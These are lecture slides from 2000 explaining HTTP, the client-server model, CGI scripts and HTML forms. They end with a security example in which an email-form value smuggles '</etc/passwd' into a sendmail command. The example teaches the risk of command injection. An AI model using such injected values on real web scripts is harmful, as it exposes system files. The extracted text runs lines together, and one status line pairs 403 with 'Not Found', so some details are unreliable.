www: an internet application bill chu. © bei-tseng chu aug 2000 www web and http www web is an...

WWW: an Internet application

Bill Chu

© Bei-Tseng Chu Aug 2000

WWW Web and HTTP

WWW web is an interconnected information servers

each server maintains a collection of documents a client can request a document from any info server one document can refer another document in any

information server via a Hyper link HTTP is the application protocol that defines

the WWW server-client interactions HTTP server maintains the HTTP documents HTTP client obtains and displays the HTTP docs


The client and server architecture A client connects to a server to

send and receive information A server typically a “large”

computer that is capable of handling multiple client requests at the same time.

The WWW is the universal client server architecture.


Benefits of the Client Server architecture Effective model for information sharing

Server makes information available for multiple clients

Clients are sure to receive the most up to date information

Server technology can be changed (e.g. a database change) without effecting clients

Clients can be dispersed geographically Server maintenance is easier since if all

clients are connecting to one place.


Protocol A protocol is a series of steps, involving two or

more parties, designed to accomplish a task Everyone involved in the protocol must know

the protocol and all of the steps to follow in advance

Everyone in the protocol must agree to follow it

The protocol must be unambiguous; each step must be well defined and there must be no chance of a misunderstanding.

The protocol must be complete; there must be a specified action for every possible situation.


HyperText Transfer Protocol (HTTP) Address: IP address + TCP port 80 Format:

HTTP request formatRequest request-URL HTTP-version0 or more headers<blank line>Body if it is a POST request

HTTP reply formatHTTP-version response-code response-phrase0 or more headers<blank line>body (HTTP document)

Rules: client sends a HTTP request to server server sends back a HTTP reply


ExampleStep one: wait for a new request

The httpd program waits for a request to arrive from some client somewhere on the Internet.

The server program listens on a port and is dormant at this state (default 80).


Step two: A request arrives from a client A user might have typed in a URL at a

browser: http://www.anywhere.com/sample.html

The browser will request a connection with the server at www.anywhere.com

The browser issues GET /sample.html http/1.0User-agent: Mosaic for X Windows/2.4Accept: text/plainAccept: text/htmlAccept: images/*


Step three: The server parses the request The server decodes the message

according to http protocol and determines what it should do:

Method: GETDocument: /sample.htmlProtocol: http, Version 1.0User agent: Mosaic for X Window/2.4Accept: text/plain,text/html, image/*


Step four: Do the method requested

The httpd program fulfills the request. To GET a document, the server looks up the file (/sample.html) in its document

tree Success: document sentHTTP/1.0 200 Document followsServer: NCSAV1.4Date: Thu, 20 Jul 2000 22:00:00 GMTContent-type: text/htmlContent-length: 1066Last-modified: Thu, 20 Jul 2000 20:38:00 GMT Failure: an error is sentHTTP/1.0 403 Not FoundServer NCSA/1.4Date: Thu, 20 Jul 2000 22:00:00 GMTContent-type: text/htmlContent-length: 0


Step five: Finish up: close file; close network connection When the file is completely sent or

an error message is sent, the httpd server is finished with its work. It closes the file and closes the network connection.

The client receives the data and formats it according to http tags.

The server is now ready for more requests and it goes to step 1.


Web scripts and CGI Web script is a program that can be

executed by the web server in response to web requests.

Any program can be a web script, there is no mandatory language

Common Gateway Interface (CGI) is a standard for how scripts can be called (by httpd) and how data is passed between the httpd server and the script


ExampleStep one: wait for a new request

The httpd program waits for a request to arrive from some client somewhere on the Internet.

The server program listens on a port and is dormant at this state.


Step two: A request arrives from a client A user might have typed in a URL at a browser:

http://www.anywhere.com/scripts/how_busy_are_you The browser will request a connection with the server at

www.anywhere.com The browser issues GET /scripts/how_busy_are_you http/1.0User-agent: Mosaic for X Windows/2.4Accept: text/plainAccept: text/htmlAccept: images/*


Step three: Do the method requested

The httpd program fulfills the request by executing the script. The server knows it is a script because it is a file under the direction “script”. The name of the “script” directory is set at web server configuration time.

To GET the script, the server looks up the file (/scripts/how_busy_are_you) in its document tree

Success: the output of the script (normally directed to the screen) is sent to browser

HTTP/1.0 200 Document followsServer: NCSAV1.4Date: Thu, 20 Jul 2000 22:00:00 GMTContent-type: text/plain11:35am up 7 days, 4:35, 5 users, load average: 0.00, 0.09, 0.00 Failure: an error is sentHTTP/1.0 200 Document followsServer: NCSAV1.4Date: Thu, 20 Jul 2000 22:00:00 GMTContent-type: text/plainCannot find uptime command on this system


Step four: Finish up: close file; close network connection When the file is completely sent or

an error message is sent, the httpd server is finished with its work. It closes the file and closes the network connection.

The client receives the data and formats it according to http tags.

The server is now ready for more requests and it goes to step 1.


Scripts and forms<TITLE> Form for CSO PH Query </TITLE><H1> Form for CSO PH Query </H1>This form will send a PH query to the specified ph server<p><hr><form ACTION="http://www.server.org:80/scripts/directory_assistance">PH server: <INPUT TYPE="text" Name="Jserver" VALUE="ns.anywhere.com" MAXLENTH="256"><dd><input type="checkbox" NAME="doname" VALUE="yes"> Return name? </dd><dd><input type="checkbox" NAME="dophone" VALUE="yes"> Return phone? </dd><dd><input type="checkbox" NAME="doemail" VALUE="yes"> Return email? </dd>

<H3> At least one of the following fields must be specified: </h3><ul><li> <input type="text" NAME="Qname" MAXLENGTH="256"> Name<li> <input type="text" Name="Qname" MAXLENGTH="256"> Email</ul><input type="submit"> </form>


Passing arguments to web scripts When the submit button is clicked the browser sends:GET

http://www.anywhere.com:80/scripts/directory_assistant?

Jserver=ns.anywhere.com&doname=yes&dophone=yes&Qname=&[email protected]

http/1.0


HTTP request methods GET: retrieve information from the server. It is

the most commonly used. It can also be used in conjunction of CGI to pass parameters to the server

HEAD: it is identical to GET, except that the server does not return a document. It is useful for verifying a document exists for checking links or time of modification

POST: allows the server to receive data from the client. It is most commonly used to send the data in HTML forms to the server for processing.


Security risks for CGI Consider a web-based email form:<form

ACTION="http://www.coolmail.com/scripts/sendmail.pl"><ul><li> email: <input type="text" NAME="email"

MAXLENGTH="256"> <li> message: <input type="text" NAME="message"

SIZE=46 MAXLENGTH="2560"> </ul><hr><input type="submit" VALUE="Send"></form>


Security problem Suppose the pearl script saves the message

into a temp file and executes the unix command:

sendmail [email protected] <temp A malicious user could type in the field for

email address: [email protected] </etc/passwd; This turns into: sendmail

[email protected]</etc/passwd;<temp

www: an internet application bill chu. © bei-tseng chu aug 2000 www web and http www web is an...

Documents